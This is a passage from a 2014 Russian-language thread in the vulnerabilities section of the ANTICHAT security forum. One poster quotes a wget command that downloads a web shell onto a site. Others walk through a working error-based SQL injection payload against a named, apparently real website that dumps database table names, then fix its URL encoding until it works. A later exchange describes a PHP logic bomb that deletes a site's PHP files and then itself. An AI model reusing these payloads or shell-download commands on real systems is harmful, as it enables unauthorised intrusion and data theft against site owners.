HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23751  
Старый 24.08.2014, 17:12
FieryDragon
Guest
Сообщений: n/a
Провел на форуме:
2413

Репутация: 0
По умолчанию

Цитата:
Сообщение от madhatter  
madhatter said:
Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.
Таки может и поверил бы, если бы знал что да как)За совет спасибо, помогло!
 
Ответить с цитированием

  #23752  
Старый 25.08.2014, 10:35
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Вопрос. Сайт с post-инъекцией
Код:
Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj&Password=gggggggggggg%27
Вроде как стандартная error based. Но при попытке получения любой информации поучаю редирект на сообщения о неверности un/pw:
Код:
Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj'&Password=gggggggggggg+OR+1=@@version--
Как обойти/раскрутить?
Смотрите в эту cторону:

Цитата:
Сообщение от None  
POST /forgotpasswordsubmit.asp
username
=
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Pages','Ima gePresets','Project','ImageUploadServers', 'NetherlandPubPhotos','dtproperties','Images'))--
 
Ответить с цитированием

  #23753  
Старый 25.08.2014, 16:47
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
Смотрите в эту cторону:
Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Incorrect syntax near the keyword 'or'.
 
Ответить с цитированием

  #23754  
Старый 25.08.2014, 17:20
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Incorrect syntax near the keyword 'or'.
Все прекрасно выводит:

Цитата:
Сообщение от None  
Microsoft OLE DB Provider for SQL Server (0x80040E07)
Conversion failed when converting the nvarchar value '
ImagesBackUp
' to data type
upd

Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
 
Ответить с цитированием

  #23755  
Старый 25.08.2014, 17:35
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Цитата:
Сообщение от YaBtr  
YaBtr said:
Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.
спасибо. Действительно, я и не подумала. Теперь всё отлично
 
Ответить с цитированием

  #23756  
Старый 26.08.2014, 22:48
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

ребят , на сайте пентестер нашел один файл *.php

содержимое такое:



Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))

насколько это верно? движок сайта - WP.
 
Ответить с цитированием

  #23757  
Старый 26.08.2014, 22:52
bumer
Guest
Сообщений: n/a
Провел на форуме:
4766

Репутация: 0
По умолчанию

Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
 
Ответить с цитированием

  #23758  
Старый 26.08.2014, 22:56
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от bumer  
bumer said:
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.
Раздел "Статьи" и пошел штудировать
 
Ответить с цитированием

  #23759  
Старый 26.08.2014, 23:04
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от B1t.exe  
B1t.exe said:
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:

Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.
Все верно, все файлы *.php в текущем каталоге будут удалены.

Причем этот файл сам себя удалит, тем самым типа "заметет следы"
 
Ответить с цитированием

  #23760  
Старый 26.08.2014, 23:22
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Цитата:
Сообщение от UXOR  
UXOR said:
Все верно, все файлы *.php в текущем каталоге будут удалены.
Причем этот файл сам себя удалит, тем самым типа "заметет следы"
Спасибо.

а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?

просто смысл удаления всех файлов.. хочу понять мотив.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ